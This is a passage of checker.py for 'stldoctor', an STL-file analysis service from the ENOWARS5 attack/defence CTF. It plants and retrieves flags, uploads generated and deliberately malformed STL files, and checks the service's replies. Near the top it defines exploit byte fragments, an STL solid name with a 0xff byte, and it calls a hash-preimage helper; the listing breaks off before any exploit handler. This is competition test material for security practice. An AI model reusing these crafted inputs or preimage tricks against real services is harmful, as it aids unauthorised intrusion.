enowars5-service-stldoctor

STL-Analyzing A/D Service for ENOWARS5 in 2021
git clone https://git.sinitax.com/sinitax/enowars5-service-stldoctor
Log | Files | Refs | README | LICENSE | sfeed.txt

checker.py (38207B)


      1#!/usr/bin/env python3
      2
      3import logging
      4import math
      5import os
      6import random
      7import re
      8import struct
      9import subprocess
     10import time
     11
     12import numpy as np
     13
     14logging.getLogger("_curses").setLevel(logging.CRITICAL)
     15
     16from asyncio import StreamReader, StreamWriter
     17from asyncio.exceptions import TimeoutError
     18from io import BytesIO
     19from logging import LoggerAdapter
     20from typing import Any, Optional, Union, cast
     21
     22from enochecker3 import (
     23    AsyncSocket,
     24    ChainDB,
     25    DependencyInjector,
     26    Enochecker,
     27    ExploitCheckerTaskMessage,
     28    GetflagCheckerTaskMessage,
     29    GetnoiseCheckerTaskMessage,
     30    InternalErrorException,
     31    MumbleException,
     32    PutflagCheckerTaskMessage,
     33    PutnoiseCheckerTaskMessage,
     34)
     35from enochecker3.utils import FlagSearcher, assert_in
     36from stl import mesh
     37
# Module-level state, evaluated once at import time.
rand = random.SystemRandom()
# Characters considered safe to embed in names without confusing the parser.
generic_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
script_path = os.path.dirname(os.path.realpath(__file__))
# Bundled example STL models shipped next to the checker.
extra_models = []
for path in os.listdir(f"{script_path}/models"):
    if path.endswith(".stl"):
        extra_models.append(f"{script_path}/models/{path}")
assert len(extra_models) > 0
# Wordlist used to build human-looking fake identifiers.
wordlist = [w for w in open(f"{script_path}/wordlist.txt").read().split() if w != ""]
# The service's interactive prompt; socket reads are framed on this marker.
prompt = b"\r$ "

# Fragments of an ascii STL whose solid name carries a 0xff byte;
# presumably combined around a payload by exploit code not visible in
# this chunk — TODO confirm against the exploit handlers.
exploit_0_file_prefix = b"""
solid test\xff"""
exploit_0_file_suffix = b"""
    facet normal 0 0 1.0
        outer loop
            vertex 1 0 0
            vertex 1 1 0
            vertex 0 1 0
        endloop
    endfacet
endsolid
"""

checker = Enochecker("stldoctor", 9090)
app = lambda: checker.app
     64
     65
     66async def timed(promise: Any, logger: LoggerAdapter, ctx: str) -> Any:
     67    logger.debug("START: {}".format(ctx))
     68    start = time.time()
     69    result = await promise
     70    end = time.time()
     71    logger.debug("DONE:  {} (took {:.3f} seconds)".format(ctx, end - start))
     72    return result
     73
     74
class Session:
    """Async wrapper around the service socket.

    Logs all traffic, frames reads on the service prompt, and converts
    read timeouts into MumbleException so the checker scores them as
    service faults rather than checker crashes.
    """

    def __init__(self, socket: AsyncSocket, logger: LoggerAdapter) -> None:
        # AsyncSocket is treated as a (StreamReader, StreamWriter) pair.
        socket_tuple = cast(tuple[StreamReader, StreamWriter], socket)
        self.reader = socket_tuple[0]
        self.writer = socket_tuple[1]
        self.logger = logger
        self.closed = False

    async def __aenter__(self) -> "Session":
        self.logger.debug("Preparing session")
        await self.prepare()
        return self

    async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
        self.logger.debug("Closing session")
        await self.close()

    async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
        """Read until *target* appears; MumbleException on timeout."""
        try:
            ctxstr = f"readuntil {target!r}" if ctx is None else ctx
            data = await timed(self.reader.readuntil(target), self.logger, ctx=ctxstr)
            # Log at most 100 bytes to keep debug output readable.
            msg = f"read:  {data[:100]!r}{'..' if len(data) > 100 else ''}"
            self.logger.debug(msg)
            return data
        except TimeoutError:
            self.logger.critical(f"Service timed out while waiting for {target!r}")
            raise MumbleException("Service took too long to respond")

    async def readline(self, ctx: Optional[str] = None) -> bytes:
        """Read a single newline-terminated line."""
        return await self.readuntil(b"\n", ctx=ctx)

    async def read(self, n: int, ctx: Optional[str] = None) -> bytes:
        """Read exactly *n* bytes; MumbleException on timeout."""
        try:
            ctxstr = f"reading {n} bytes" if ctx is None else ctx
            data = await timed(self.reader.readexactly(n), self.logger, ctx=ctxstr)
            msg = f"read:  {data[:60]!r}{'..' if len(data) > 60 else ''}"
            self.logger.debug(msg)
            return data
        except TimeoutError:
            self.logger.critical(f"Service timed out while reading {n} bytes")
            raise MumbleException("Service took too long to respond")

    async def drain(self) -> None:
        await self.writer.drain()

    def write(self, data: bytes) -> None:
        # Synchronous queue to the writer; callers must drain() afterwards.
        msg = f"write: {data[:60]!r}{'..' if len(data) > 60 else ''}"
        self.logger.debug(msg)
        self.writer.write(data)

    async def prepare(self) -> None:
        """Consume the banner up to the first prompt."""
        await self.readuntil(prompt)

    async def exit(self) -> None:
        """Politely terminate the session via the service's exit command."""
        if self.closed:
            return
        self.write(b"exit\n")
        await self.drain()
        await self.readuntil(b"bye!")
        await self.close()

    async def close(self) -> None:
        """Close the underlying socket (idempotent)."""
        if self.closed:
            return
        self.closed = True
        self.writer.close()
        await self.writer.wait_closed()
    142
    143
@checker.register_dependency
def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
    # Dependency-injection factory so checker methods can request a Session.
    return Session(socket, logger)
    147
    148
    149def includes_all(resp: bytes, targets: list[bytes]) -> bool:
    150    for m in targets:
    151        if m not in resp:
    152            return False
    153    return True
    154
    155
    156def includes_any(resp: bytes, targets: list[bytes]) -> bool:
    157    for m in targets:
    158        if m in resp:
    159            return True
    160    return False
    161
    162
    163def nnt(ino: Optional[tuple[bytes, bytes]]) -> tuple[bytes, bytes]:
    164    assert ino is not None
    165    return ino
    166
    167
    168def nnb(ino: Optional[bytes]) -> bytes:
    169    assert ino is not None
    170    return ino
    171
    172
    173def randbool() -> bool:
    174    return rand.randint(0, 1) == 1
    175
    176
    177def leetify(clean: str) -> str:
    178    conv = {
    179        "O": "0",
    180        "l": "1",
    181        "I": "1",
    182        "Z": "2",
    183        "E": "3",
    184        "A": "4",
    185        "S": "5",
    186        "G": "6",
    187        "T": "7",
    188    }
    189    out = [c.upper() if randbool() else c for c in clean.lower()]
    190    return "".join([conv[c] if c in conv else c for c in out])
    191
    192
    193def fakeid(minlen: int = 25, maxlen: int = 50) -> bytes:
    194    choice = rand.randint(0, 2)
    195    if choice == 0:  # most random without hurting parsing
    196        idlen = rand.randint(minlen, maxlen)
    197        return bytes([rand.randint(33, 127) for i in range(idlen)])
    198    elif choice == 1:  # a cat walking across the keyboard
    199        idlen = rand.randint(minlen, maxlen)
    200        alph = b"0123456789abcdefghijklmopqrstuvwxyz"
    201        return bytes([rand.choice(alph) for i in range(idlen)])
    202    else:  # a hacker band name
    203        idstr = b""
    204        while len(idstr) < minlen:
    205            word = rand.choice(wordlist)
    206            if idstr != b"":
    207                idstr += b"-"
    208            idstr += leetify(word).encode()
    209        idstr += b"-" + leetify(rand.choice(wordlist)).encode()
    210        return idstr[:maxlen]
    211
    212
    213def fakeids(n: int) -> list[bytes]:
    214    return [fakeid() for i in range(n)]
    215
    216
    217def approx_equal(f1: float, f2: float, precision: int = 2) -> bool:
    218    return round(f1, precision) == round(f2, precision)
    219
    220
def reverse_hash(hashstr: str) -> bytes:
    """Find a preimage for *hashstr* using the bundled revhash helper binary.

    The trailing newline of the helper's stdout is stripped ([:-1]);
    an empty result is treated as an internal checker error.
    """
    data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1]
    if data == b"":
        raise InternalErrorException(f"Failed to find hash preimage of {hashstr!r}")
    return data
    226
    227
    228def parse_int(intstr: Union[str, bytes]) -> Optional[int]:
    229    try:
    230        return int(intstr)
    231    except:
    232        return None
    233
    234
    235def parse_float(floatstr: Union[str, bytes]) -> Optional[float]:
    236    try:
    237        return float(floatstr)
    238    except:
    239        return None
    240
    241
    242def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool:
    243    return len([v for v in data if v not in alph]) == 0
    244
    245
    246def assert_match(data: bytes, pattern: bytes, raiser: Any) -> bytes:
    247    rem = re.search(pattern, data)
    248    if rem is None:
    249        raise raiser(f"Expected pattern {pattern!r} to match {data!r}")
    250    if len(rem.groups()) > 0:
    251        return rem.group(1)
    252    return rem.group(0)
    253
    254
    255def genfile_ascii(solidname: bytes, malformed: bool = None) -> bytes:
    256    # Generate a valid ascii STL file or one that is malformed in a
    257    # way that it can't be interpreted by the service, but might succeed
    258    # with typical stl parsing libraries (as a means to identify them)
    259    indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
    260    facet_count = rand.randint(4, 30)
    261
    262    if len(solidname) != 0:
    263        content = b"solid " + solidname + b"\n"
    264    else:
    265        content = b"solid\n"
    266
    267    for fi in range(facet_count):
    268        # MALFORM 1: prefix keyword
    269        if malformed == 1:
    270            content += indent * 1 + b"facet norm"
    271        else:
    272            content += indent * 1 + b"facet normal "
    273
    274        vs = [[rand.random() for i in range(3)] for k in range(3)]
    275        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
    276        norm = norm / np.linalg.norm(norm)
    277
    278        content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
    279
    280        # MALFORM 2: too many spaces
    281        if malformed == 2:
    282            content += indent * 2 + b"outer  loop\n"
    283        else:
    284            content += indent * 2 + b"outer loop\n"
    285
    286        for i in range(3):
    287            content += (
    288                indent * 3
    289                + b"vertex "
    290                + " ".join([f"{v:.2f}" for v in vs[i]]).encode()
    291                + b"\n"
    292            )
    293
    294        content += indent * 2 + b"endloop\n"
    295        content += indent + b"endfacet\n"
    296
    297    # MALFORM 3: different endsolid name
    298    if malformed == 3:
    299        content += b"endsolid end\n"
    300    if solidname != b"":
    301        content += b"endsolid " + solidname + b"\n"
    302    else:
    303        content += b"endsolid\n"
    304
    305    return content
    306
    307
    308def genfile_bin(solidname: bytes, malformed: bool = None) -> bytes:
    309    # Generate a valid binary STL file or one that is malformed in a
    310    # way that it can't be interpreted by the service, but might succeed
    311    # with typical stl parsing libraries (as a means to identify them)
    312    facet_count = rand.randint(4, 30)
    313
    314    if len(solidname) > 78:
    315        raise InternalErrorException(
    316            "Solidname to embed in header is larger than header itself"
    317        )
    318    if solidname != "":
    319        content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
    320    else:
    321        content = b"#" + b"\x00" * 79
    322
    323    # MALFORM 1: specify more facets than are in the file
    324    if malformed == 1:
    325        content += struct.pack("<I", facet_count + rand.randint(3, 7))
    326    else:
    327        content += struct.pack("<I", facet_count)
    328
    329    for fi in range(facet_count):
    330        vs = [[rand.random() for i in range(3)] for k in range(3)]
    331        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
    332
    333        # MALFORM 2: invalid float for norm / vec
    334        if malformed == 2:
    335            norm[rand.randint(0, 2)] = math.nan
    336            vs[rand.randint(0, 2)][rand.randint(0, 2)] = math.inf
    337        for i in range(3):
    338            content += struct.pack("<f", norm[i])
    339        for k in range(3):
    340            for i in range(3):
    341                content += struct.pack("<f", vs[k][i])
    342        content += b"\x00\x00"
    343
    344    # MALFORM 3: add extra data to the end of the file
    345    if malformed == 3:
    346        content += bytes([rand.randint(0, 255) for i in range(30)])
    347
    348    return content
    349
    350
    351def genfile(solidname: bytes, filetype: str, malformed: Optional[Any] = None) -> bytes:
    352    if filetype == "ascii":
    353        return genfile_ascii(solidname, malformed=malformed)
    354    elif filetype == "bin":
    355        return genfile_bin(solidname, malformed=malformed)
    356    elif filetype == "garbage":
    357        return bytes([rand.randint(0, 255) for i in range(rand.randint(100, 600))])
    358    else:
    359        raise InternalErrorException("Invalid file type supplied")
    360
    361
def getfile(filetype: str) -> tuple[bytes, bytes]:
    """Produce an STL file of *filetype* ("ascii", else binary).

    Returns (stlfile, solidname). Most of the time a file is generated
    from scratch; otherwise one of the bundled example models is reused
    with its embedded OpenSCAD name replaced by a fresh fake id.
    """
    if filetype == "ascii":
        if rand.randint(0, 20) >= 5:
            solidname = fakeid()
            stlfile = genfile(solidname, "ascii")
        else:
            model = rand.choice([v for v in extra_models if v.endswith("-ascii.stl")])
            stlfile = open(model, "rb").read()
            solidname = fakeid()
            stlfile = stlfile.replace(b"OpenSCAD_Model", solidname)
    else:
        if rand.randint(0, 20) >= 5:
            solidname = fakeid()
            stlfile = genfile(solidname, "bin")
        else:
            model = rand.choice([v for v in extra_models if v.endswith("-bin.stl")])
            stlfile = open(model, "rb").read()
            # Fixed 14-byte name so the 80-byte binary header keeps its size.
            solidname = fakeid(minlen=14, maxlen=14)
            stlfile = b"#" + solidname + stlfile[15:]  # replaces b"OpenSCAD Model\n"
    return stlfile, solidname
    382
    383
def parse_stlinfo(stlfile: bytes) -> Any:
    """Parse *stlfile* with numpy-stl and compute reference geometry info.

    Returns a dict (points, bounding box origin/size, byte size, triangle
    count) used as ground truth when validating the service's own STL info
    output. Raises InternalErrorException if our own file fails to parse.
    """
    fakefile = BytesIO()
    fakefile.write(stlfile)
    fakefile.seek(0)
    try:
        name, data = mesh.Mesh.load(fakefile)
        meshinfo = mesh.Mesh(data, True, name=name, speedups=True)  # type: ignore
    except Exception as e:
        raise InternalErrorException(f"Unable to parse generated STL file: {e}")
    bmin = [math.inf for i in range(3)]
    bmax = [-math.inf for i in range(3)]
    if len(meshinfo.points) == 0:
        raise InternalErrorException("Parsed STL mesh has 0 points!")
    # Each row of points holds one triangle as 9 floats (3 vertices x xyz);
    # scan every vertex to build the axis-aligned bounding box.
    for p in meshinfo.points:
        for k in range(3):
            for i in range(3):
                bmin[k] = min(bmin[k], float(p[3 * i + k]))
                bmax[k] = max(bmax[k], float(p[3 * i + k]))
    info = {
        "points": meshinfo.points,
        "bb_origin": bmin,
        "bb_size": [bmax[i] - bmin[i] for i in range(3)],
        "size": len(stlfile),
        "triangle_count": len(meshinfo.points),
    }
    return info
    410
    411
async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]:
    """Fetch *key* from the chain db, mapping KeyError to MumbleException."""
    try:
        return await db.get(key)
    except KeyError:
        raise MumbleException(
            "Could not retrieve necessary info for service interaction"
        )
    419
    420
    421# SERVICE FUNCTIONS #
    422
    423
async def do_auth(
    session: Session, authstr: bytes, check: bool = True, newuser: bool = True
) -> Optional[bytes]:
    """Authenticate with *authstr* and return the user id the service reports.

    *newuser* states whether we expect a fresh account or an existing one
    ("Welcome back"). With check=True, mismatches raise MumbleException;
    otherwise None is returned on failure.
    """
    # Login with authstr
    session.write(b"auth\n")
    session.write(authstr + b"\n")
    await session.drain()

    # Check for errors
    resp = await session.readuntil(prompt, ctx="reading auth response")
    # NOTE(review): resp spans everything up to the next prompt, so it can
    # never equal b"ERR:" exactly — this branch looks dead; error replies
    # fall through to the parse below, which raises MumbleException anyway.
    # Probably meant resp.startswith(b"ERR:") — confirm before changing.
    if resp == b"ERR:":
        if check:
            session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}")
            raise MumbleException("Authentication not working properly")
        return None

    # Also check success message
    try:
        userid = resp.split(b"!", 1)[0].split(b"Logged in with ID ", 1)[1]
    except:
        session.logger.critical(f"Login with pass {authstr!r} failed:\n{resp!r}")
        raise MumbleException("Authentication not working properly")

    # Check whether this is a new user (no "Welcome back" greeting)
    is_newuser = b"Welcome back" not in resp
    if is_newuser != newuser:
        if check:
            if newuser:
                session.logger.critical("Unexpectedly, user dir exists already!")
            else:
                session.logger.critical("Unexpectedly, user dir doesnt exist!")
            raise MumbleException("Authentication not working properly")
        return None

    session.logger.debug(f"Logged in as user: {userid!r}")

    return userid
    461
    462
async def do_list(session: Session, check: bool = True) -> Optional[bytes]:
    """Run the list command and return the raw listing response.

    With check=True an error reply raises MumbleException; otherwise None
    is returned on failure.
    """
    session.write(b"list\n")
    await session.drain()

    # Check for errors (b">> " marks listing entries, so an ERR alongside
    # entries is not treated as a failure)
    resp = await session.readuntil(prompt, ctx="reading list response")
    if b"ERR:" in resp and b">> " not in resp:
        if check:
            session.logger.critical(f"Failed to list private files:\n{resp!r}")
            raise MumbleException("File listing not working properly")
        return None

    return resp
    476
    477
async def do_upload(
    session: Session,
    modelname: bytes,
    stlfile: bytes,
    check: bool = True,
) -> Optional[bytes]:
    """Upload *stlfile* under *modelname* and return the reported model id.

    Walks the service's interactive upload flow (name -> size -> contents),
    checking for an ERR reply after each step. With check=True failures
    raise MumbleException; otherwise None is returned.
    """

    session.logger.debug(f"Uploading model with name {modelname!r}")

    # start upload and enter name
    session.write(b"upload\n")
    session.write(modelname + b"\n")
    await session.drain()

    # check for error with name
    await session.readuntil(b"name: ")
    resp = await session.read(4, ctx="checking for err response")
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Failed during name check: {resp!r}")
            raise MumbleException("File upload not working properly")
        return None

    # write size and contents in together
    await session.readuntil(b"size: ")
    session.write(f"{len(stlfile)}\n".encode())
    session.write(stlfile)
    await session.drain()

    # check for error with size
    resp = await session.read(4, ctx="checking for err response")
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Failed during size check: {resp!r}")
            raise MumbleException("File upload not working properly")
        return None

    # check for error with file
    await session.readuntil(b"listening..\n")
    resp = await session.readline()
    if b"ERR:" in resp:
        if check:
            session.logger.critical(f"Failed during stl parsing: {resp!r}")
            raise MumbleException("File upload not working properly")
        await session.readuntil(prompt)
        return None

    # parse returned id
    try:
        modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
        if modelid == b"":
            raise Exception
    except:
        session.logger.critical(f"Invalid size during upload:\n{resp!r}")
        raise MumbleException("File upload not working properly")

    session.logger.debug(f"Uploaded model with id {modelid!r}")

    await session.readuntil(prompt, ctx="waiting for prompt")
    return modelid
    540
    541
async def do_search(
    session: Session,
    modelname: bytes,
    download: bool = False,
    check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
    """Search for *modelname* and return (info text, stl contents).

    Selects the most recent search result, optionally downloading the file
    contents (empty bytes when download=False). With check=True failures
    raise MumbleException; otherwise None is returned.
    """
    session.logger.debug(f"Retrieving model with name {modelname!r}")

    # get possible hashes
    session.write(b"search " + modelname + b"\n")
    await session.drain()

    # check for error with search query
    resp = await session.read(4)
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(
                f"Failed to retrieve model {modelname!r}:\n{resp!r}"
            )
            raise MumbleException("File search not working properly")
        return None

    # collect results
    resp += await session.readuntil(b"quit]: ")
    try:
        resp = resp.split(b">")[0]
    except:
        session.logger.critical('Search response missing b">" delim')
        raise MumbleException("File search not working properly")
    results = [l.strip() for l in resp.split(b"\n") if l.strip() != b""]

    # request most recent result (later in index file)
    session.write(results[-1] + b"\n")
    session.write(b"y\n" if download else b"n\n")
    await session.drain()

    # check for error in hash provided
    resp = await session.read(4)
    if resp == b"ERR:":
        # cleanup download y/n interpreted as command
        await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Error selecting file: {results[0]!r}")
            raise MumbleException("File search not working properly")
        return None
    fileinfo = resp + await session.readuntil(
        b"================== \n", ctx="reading stl info"
    )

    stlfile = b""
    if download:  # Parse file contents
        await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
        resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)")
        resp = resp[:-3]
        size = parse_int(resp)
        if size is None:
            raise MumbleException(f"Invalid download size: {resp!r}")
        session.logger.debug(f"Download size: {size}")
        stlfile = await session.read(size, ctx="reading stl contents")

    # only one result
    session.write(b"q\n")
    await session.drain()

    # cleanup..
    await session.readuntil(prompt)
    return fileinfo, stlfile
    610
    611
    612# CHECK WRAPPERS #
    613
    614
async def check_listed(session: Session, includes: list[bytes]) -> bytes:
    """List files and assert that every entry of *includes* appears."""
    resp = nnb(await do_list(session, check=True))
    if not includes_all(resp, includes):
        session.logger.critical(f"Failed to find {includes} in listing:\n{resp!r}")
        raise MumbleException("File listing not working properly")
    return resp
    621
    622
async def check_not_listed(
    session: Session,
    excludes: list[bytes],
    fail: bool = False,
) -> Optional[bytes]:
    """List files and assert none of *excludes* appear.

    With fail=True the list command itself is expected to fail.
    """
    resp = await do_list(session, check=False)
    if resp is not None:
        if fail:
            session.logger.critical(f"Expected list to fail, but returned:\n{resp!r}")
            raise MumbleException("File listing not working properly")
        if includes_any(resp, excludes):
            session.logger.critical(
                f"Unexpectedly found one of {excludes} in listing:\n{resp!r}"
            )
            raise MumbleException("File listing not working properly")
    elif not fail:
        session.logger.critical(f"list failed unexpectedly:\n{resp!r}")
        raise MumbleException("File listing not working properly")
    return resp
    642
    643
async def check_in_search(
    session: Session,
    modelname: bytes,
    includes: list[bytes],
    download: bool = False,
) -> tuple[bytes, bytes]:
    """Search for *modelname* and assert all *includes* appear in info+file."""
    resp = nnt(await do_search(session, modelname, download, check=True))
    if not includes_all(resp[0] + resp[1], includes):
        session.logger.critical(
            f"Retrieved info for {modelname!r} is missing {includes}: {resp[0]+resp[1]!r}"
        )
        raise MumbleException("File search not working properly")
    return resp
    657
    658
    659async def check_not_in_search(
    660    session: Session,
    661    modelname: bytes,
    662    excludes: list[bytes],
    663    download: bool = False,
    664    fail: bool = False,
    665) -> Optional[tuple[bytes, bytes]]:
    666    resp = await do_search(session, modelname, download, check=False)
    667    if resp is not None:
    668        combined = resp[0] + resp[1]
    669        if fail:
    670            session.logger.critical(
    671                "Search for {modelname!r} succeeded unexpectedly:\n{combined!r}"
    672            )
    673            raise MumbleException("File search not working properly")
    674        if includes_any(combined, excludes):
    675            session.logger.critical(
    676                f"Unexpectedly {modelname!r} info contains one of {excludes}: {combined!r}"
    677            )
    678            raise MumbleException("File search not working properly")
    679    elif not fail:
    680        session.logger.critical(f"Search for {modelname!r} failed unexpectedly")
    681        raise MumbleException("File search not working properly")
    682    return resp
    683
    684
    685def check_hash(hashstr: bytes) -> None:
    686    if not has_alph(hashstr, b"0123456789abcdef"):
    687        raise MumbleException("Invalid model hash format returned")
    688
    689
    690def check_stlinfo(
    691    logger: LoggerAdapter,
    692    resp: bytes,
    693    ref_info: Any,
    694    ref_modelid: Optional[bytes] = None,
    695    ref_modelname: Optional[bytes] = None,
    696    ref_solidname: Optional[bytes] = None,
    697) -> None:
    698    def logthrow(msg: str) -> None:
    699        logger.critical(msg)
    700        raise MumbleException("STL parsing not working properly")
    701
    702    size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException))
    703    if not size or size != ref_info["size"]:
    704        logthrow(
    705            f"STL info returned no / invalid file size: {size} != {ref_info['size']}"
    706        )
    707
    708    triangle_count = parse_int(
    709        assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)
    710    )
    711    if not triangle_count or triangle_count != ref_info["triangle_count"]:
    712        logthrow(
    713            f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}"
    714        )
    715
    716    bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException)
    717    bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
    718    for i in range(3):
    719        val = bb_size[i]
    720        if val is None:
    721            logthrow(f"STL info returned invalid bounding box size: {bb_size_str!r}")
    722        elif not approx_equal(val, ref_info["bb_size"][i]):
    723            logthrow(
    724                f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}"
    725            )
    726
    727    bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException)
    728    bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
    729    for i in range(3):
    730        val = bb_origin[i]
    731        if val is None:
    732            logthrow(
    733                f"STL info returned invalid bounding box origin: {bb_origin_str!r}"
    734            )
    735        elif not approx_equal(val, ref_info["bb_origin"][i]):
    736            logthrow(
    737                f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}"
    738            )
    739
    740    triangle_count = parse_int(
    741        assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)
    742    )
    743    if triangle_count is None or triangle_count != ref_info["triangle_count"]:
    744        logthrow(
    745            f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}"
    746        )
    747
    748    if ref_modelname:
    749        modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException)
    750        if modelname != ref_modelname:
    751            logthrow(f"Got modelname {modelname!r}, expected {ref_modelname!r}")
    752
    753    if ref_modelid:
    754        modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException)
    755        if modelid != ref_modelid:
    756            logthrow(f"Got modelid {modelid!r}, expected {ref_modelid!r}")
    757
    758    if ref_solidname:
    759        solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException)
    760        if solidname != ref_solidname:
    761            logthrow(f"Got solidname {solidname!r}, expected {ref_solidname!r}")
    762
    763
    764# TEST METHODS #
    765
    766
async def test_good_upload(di: DependencyInjector, filetype: str) -> None:
    """Upload a well-formed file, retrieve it via search, verify its info."""
    modelname = fakeid()
    stlfile, solidname = getfile(filetype)
    ref = parse_stlinfo(stlfile)

    # Upload file, get it with search, verify returned info
    session = await di.get(Session)
    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    expected = [modelname, solidname, stlfile, modelid]
    info, stl = await check_in_search(session, modelname, expected, download=True)
    check_stlinfo(
        session.logger,
        info,
        ref,
        ref_modelname=modelname,
        ref_modelid=modelid,
        ref_solidname=solidname,
    )
    785
    786
async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None:
    """Upload a malformed file (see genfile variants) and expect rejection."""
    modelname, solidname = fakeids(2)
    stlfile = genfile(solidname, filetype, malformed=variant)

    # Ensure a malformed file causes an error
    session = await di.get(Session)
    resp = await do_upload(session, modelname, stlfile, check=False)
    if resp is not None:
        session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
        raise MumbleException("Upload validation not working properly")
    797
    798
    799async def test_hash_collision(di: DependencyInjector) -> None:
    800    # See if using a random string we hit a hash collision for search / auth
    801    session = await di.get(Session)
    802    sresp = await do_search(session, fakeid(), download=False, check=False)
    803    if sresp is not None:
    804        session.logger.critical("File search succeeded on random file")
    805        raise MumbleException("Hash function not working properly")
    806    aresp = await do_auth(session, fakeid(), check=False, newuser=False)
    807    if aresp is not None:
    808        session.logger.critical("Auth succeeded for user with random str")
    809        raise MumbleException("Hash function not working properly")
    810
    811
    812# CHECKER METHODS #
    813
    814
    815@checker.putflag(0)
    816async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> str:
    817    modelname = fakeid()
    818    stlfile = genfile(task.flag.encode(), "ascii")
    819    db = await di.get(ChainDB)
    820
    821    # Generate a file with flag in solidname and upload it (unregistered, ascii)
    822    session = await di.get(Session)
    823    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    824
    825    await db.set("info", (modelname, modelid))
    826    return "Model {}.. is kinda sus".format(modelid[:10].decode())
    827
    828
    829@checker.putflag(1)
    830async def putflag_private(
    831    task: PutflagCheckerTaskMessage, di: DependencyInjector
    832) -> str:
    833    modelname, authstr = fakeids(2)
    834    stlfile = genfile(task.flag.encode(), "bin")
    835    db = await di.get(ChainDB)
    836
    837    # Generate a file with flag in solidname and upload it (registered, bin)
    838    session = await di.get(Session)
    839    userid = nnb(await do_auth(session, authstr, check=True, newuser=True))
    840    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    841
    842    await db.set("info", (modelname, modelid, authstr))
    843    return "User {}.. is kinda sus".format(userid[:10].decode())
    844
    845
    846@checker.getflag(0)
    847async def getflag_unregistered(
    848    task: GetflagCheckerTaskMessage, di: DependencyInjector
    849) -> None:
    850    db = await di.get(ChainDB)
    851    modelname, modelid = await getdb(db, "info")
    852
    853    # Search for flag file and verify flag is included
    854    session = await di.get(Session)
    855    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    856    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")
    857
    858
    859@checker.getflag(1)
    860async def getflag_registered(
    861    task: GetflagCheckerTaskMessage, di: DependencyInjector
    862) -> None:
    863    db = await di.get(ChainDB)
    864    modelname, modelid, authstr = await getdb(db, "info")
    865
    866    # Authenticate, get flag via search and list
    867    session = await di.get(Session)
    868    await do_auth(session, authstr, check=True, newuser=False)
    869    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    870    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")
    871    lresp = nnb(await do_list(session, check=True))
    872    assert_in(task.flag.encode(), lresp, "Failed to retrieve flag")
    873
    874
    875@checker.putnoise(0)
    876async def putnoise_unregistered(
    877    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
    878) -> None:
    879    modelname, solidname = fakeids(2)
    880    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    881    db = await di.get(ChainDB)
    882
    883    # Upload file for later checking
    884    session = await di.get(Session)
    885    modelid = await do_upload(session, modelname, stlfile, check=True)
    886
    887    await db.set("info", (modelid, modelname, solidname, stlfile))
    888
    889
    890@checker.putnoise(1)
    891async def putnoise_registered(
    892    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
    893) -> None:
    894    modelname, solidname, authstr = fakeids(3)
    895    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    896    db = await di.get(ChainDB)
    897
    898    # Upload private file for later checking
    899    session = await di.get(Session)
    900    await do_auth(session, authstr, check=True, newuser=True)
    901    modelid = await do_upload(session, modelname, stlfile, check=True)
    902
    903    await db.set("info", (modelid, modelname, solidname, stlfile, authstr))
    904
    905
    906@checker.getnoise(0)
    907async def getnoise_unregistered(
    908    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
    909) -> None:
    910    db = await di.get(ChainDB)
    911    modelid, modelname, solidname, stlfile = await getdb(db, "info")
    912    ref = parse_stlinfo(stlfile)
    913
    914    session = await di.get(Session)
    915    # check that search works on persisted file
    916    expected = [modelname, solidname, stlfile, modelid]
    917    info, stl = await check_in_search(session, modelname, expected, download=True)
    918    # check that search for cached value works
    919    info, stl = await check_in_search(session, b"last", expected, download=True)
